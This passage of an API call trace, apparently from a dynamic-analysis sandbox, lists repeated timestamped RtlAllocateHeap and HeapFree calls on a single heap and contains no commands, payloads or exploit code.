hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0199.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x2c0000, 